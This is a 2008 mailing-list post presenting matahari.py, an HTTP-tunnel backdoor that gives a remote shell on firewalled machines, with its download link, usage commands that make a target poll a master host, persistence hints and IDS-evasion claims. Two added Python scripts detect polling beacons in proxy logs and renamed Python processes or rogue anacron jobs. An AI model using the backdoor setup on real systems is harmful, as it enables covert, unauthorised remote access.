HackFest Series: Matahari.py HTTP Tunnel - Firewall Traversal
Lisa Kachold
lisakachold at obnosis.com
Wed Oct 22 21:51:04 MST 2008
Matahari
matahari is a Python script designed to provide a basic non-interactive shell on remote systems behind firewalls. It is intended for use by system administrators who may need an emergency backdoor to access a firewalled machine.
Once you set up the script on the target machine (the client), it begins trying to retrieve commands from the master machine (the server). The time between periodic requests (polls) can be configured to suit different needs, ranging from low latency (frequent polls) to stealthier behaviour (infrequent polls).
All traffic between the target and the master machine is carried in HTTP GET/POST requests and their corresponding responses, so it traverses the firewall as ordinary outgoing web traffic. Optional IDS-evasion techniques can be used in special scenarios where the backdoor should remain undetected by the firewall administrators.
Matahari.py's HTTP port is configurable; Snort and many other IDS do not intercept matahari packets.
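Because the client polls the master on a schedule, the pattern a defender can look for in web proxy logs is a client that requests the same host at near-constant intervals. The following is an added example, not part of the original post or of the matahari project: it parses a simple proxy log format and flags client/host pairs whose inter-request intervals have a low coefficient of variation. The log format, the sample lines, the host names and the thresholds are all constructed for illustration.

```python
"""Flag HTTP clients that contact one host at near-fixed intervals (beaconing).

Added example; not part of the original post or the matahari project.
Log format, sample lines, host names and thresholds are constructed.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log: "<ISO timestamp> <client> <method> <host> <path>".
# Lines are deliberately not in time order, and one line is malformed.
SAMPLE_LOG = """\
2008-10-22T21:00:00 10.0.0.5 GET master.bar.com /poll
2008-10-22T21:00:02 10.0.0.9 GET www.example.org /index.html
2008-10-22T21:02:01 10.0.0.5 GET master.bar.com /poll
2008-10-22T21:01:00 10.0.0.5 GET master.bar.com /poll
2008-10-22T21:02:40 10.0.0.9 GET www.example.org /news
garbage line
2008-10-22T21:03:00 10.0.0.5 POST master.bar.com /result
2008-10-22T21:09:15 10.0.0.9 GET www.example.org /about
2008-10-22T21:04:00 10.0.0.5 GET master.bar.com /poll
2008-10-22T21:10:00 10.0.0.9 GET www.example.org /contact
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\S+)$")


def parse_log(lines):
    """Return (timestamp, client, method, host) tuples sorted by time.

    Malformed lines are skipped rather than aborting the whole run.
    """
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        events.append((ts, m.group(2), m.group(3), m.group(4)))
    events.sort()
    return events


def find_beacons(lines, min_requests=4, max_cv=0.15):
    """Return {(client, host): stats} for pairs whose request spacing is regular.

    Regularity is measured as the coefficient of variation (stdev / mean) of the
    gaps between consecutive requests; a pure timer gives 0, human browsing is
    far higher. min_requests and max_cv are assumed tuning values.
    """
    by_pair = defaultdict(list)
    for ts, client, _method, host in parse_log(lines):
        by_pair[(client, host)].append(ts)

    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue
        intervals = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(intervals)
        if mean <= 0:
            continue  # duplicate timestamps; nothing meaningful to measure
        cv = statistics.pstdev(intervals) / mean
        if cv <= max_cv:
            hits[pair] = {"requests": len(stamps), "mean_interval": mean, "cv": cv}
    return hits


if __name__ == "__main__":
    for (client, host), stats in find_beacons(SAMPLE_LOG.splitlines()).items():
        print(f"{client} -> {host}: {stats['requests']} requests, "
              f"every {stats['mean_interval']:.0f}s (cv={stats['cv']:.3f})")
```

A client in "polite" mode with a long poll interval will need a longer log window before it reaches `min_requests`; the threshold is a trade-off between catching slow pollers and the size of the candidate list you then review by hand.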
The script must be set up on both sides. It is available on BackTrack (KDE --> Maintaining Access --> BackDoors and Rootkits) or, for the other side, via a quick wget from here:
http://sourceforge.net/project/showfiles.php?group_id=206888&package_id=247564&release_id=547359
Suspect your server has been compromised? Watch for rogue Python processes (renamed to something that SOUNDS perfectly believable, like "updatd") and/or matahari running from anacron (which is often left enabled yet ignored), which opens scheduled tunnel access.
It is also exceptional as an administrative security honeypot tool: you can watch a compromised server for information-gathering purposes without the script kiddies catching on, should you not want to expose a log server.
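The two host-side indicators in the paragraph above (a Python interpreter running under a believable process name, and a job scheduled from anacron) can be checked with a short script. The following is an added example, not part of the original post or of the matahari project. The process snapshot and the anacrontab are constructed; the "updatd" name is the post's own illustration; `known_ok` is an assumed allowlist for scripts that legitimately run under their own name, and `STOCK_JOBS` is an assumed set of default anacron job identifiers.

```python
"""Host-side checks for a Python process hiding under another name and for
non-default anacron jobs.

Added example; not part of the original post or the matahari project.
The process snapshot and anacrontab below are constructed.
"""
import os
import re

# Matches "python", "python2.5", "python3" etc. at the end of a name.
PYTHON_RE = re.compile(r"python[0-9.]*$")

# Constructed snapshot of /proc/<pid>/{comm,exe,cmdline}. A script started via
# its "#!/usr/bin/python" line shows the script name in comm while exe still
# points at the interpreter; that mismatch is what we look for.
SAMPLE_PROCS = [
    {"pid": 412, "comm": "sshd", "exe": "/usr/sbin/sshd",
     "cmdline": ["/usr/sbin/sshd", "-D"]},
    {"pid": 933, "comm": "python", "exe": "/usr/bin/python2.5",
     "cmdline": ["python", "/opt/app/worker.py"]},
    {"pid": 1207, "comm": "updatd", "exe": "/usr/bin/python2.5",
     "cmdline": ["updatd"]},
    {"pid": 2001, "comm": "yum-updatesd", "exe": "/usr/bin/python2.5",
     "cmdline": ["/usr/sbin/yum-updatesd"]},
]

# Constructed /etc/anacrontab.
SAMPLE_ANACRONTAB = """\
# /etc/anacrontab: constructed sample
SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
1       5       cron.daily      run-parts /etc/cron.daily
7       10      cron.weekly     run-parts /etc/cron.weekly
@monthly 15     cron.monthly    run-parts /etc/cron.monthly
1       2       updatd          nohup /usr/local/sbin/updatd >/dev/null 2>&1
"""

# Assumed default job identifiers on a stock install.
STOCK_JOBS = frozenset({"cron.daily", "cron.weekly", "cron.monthly"})


def find_renamed_python(procs, known_ok=frozenset()):
    """Return pids whose executable is a Python interpreter but whose process
    name is not python-like. Legitimate Python daemons also match, so the
    result is a review list; known_ok suppresses names you have verified."""
    hits = []
    for p in procs:
        exe_name = os.path.basename(p["exe"])
        if (PYTHON_RE.search(exe_name)
                and not PYTHON_RE.search(p["comm"])
                and p["comm"] not in known_ok):
            hits.append(p["pid"])
    return hits


def find_suspicious_anacron(lines, stock_jobs=STOCK_JOBS):
    """Return (job_id, command) for anacrontab jobs not in the stock set.

    Skips blank lines, comments and VAR=value assignments; the job line
    format is "<period> <delay> <job-id> <command...>".
    """
    hits = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        _period, _delay, job_id, command = parts
        if job_id not in stock_jobs:
            hits.append((job_id, command))
    return hits


def collect_live_processes():
    """Read the same three fields from a running Linux host (empty elsewhere)."""
    procs = []
    if not os.path.isdir("/proc"):
        return procs
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = [a.decode(errors="replace")
                           for a in f.read().split(b"\0") if a]
        except OSError:
            continue  # process exited, or not readable by this user
        procs.append({"pid": int(pid), "comm": comm, "exe": exe, "cmdline": cmdline})
    return procs


if __name__ == "__main__":
    print("renamed python candidates:", find_renamed_python(SAMPLE_PROCS))
    print("non-stock anacron jobs:", find_suspicious_anacron(SAMPLE_ANACRONTAB.splitlines()))
```

Run it against `collect_live_processes()` and the real `/etc/anacrontab` (as root, since `/proc/<pid>/exe` of other users' processes is otherwise unreadable) and then look at the `cmdline` and the script file of each candidate; the name mismatch alone is a prompt to look, not a verdict.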
Usage:
Suppose you have a target machine (target.foo.com) behind a firewall and you want to be able to execute commands from a master machine (master.bar.com). The scenario could be set up as follows:
Exec on target machine:
    ./matahari.py -c master.bar.com -T polite
Be sure to keep the process running even after logging off (nohup and screen are your friends).
Exec anytime on master machine:
    ./matahari.py -s target.foo.com
Reference: http://matahari.sourceforce.net
http://wapedia.mobi/en/Obnosis | http://en.wiktionary.org/wiki/Citations:obnosis | Obnosis.com (503)754-4452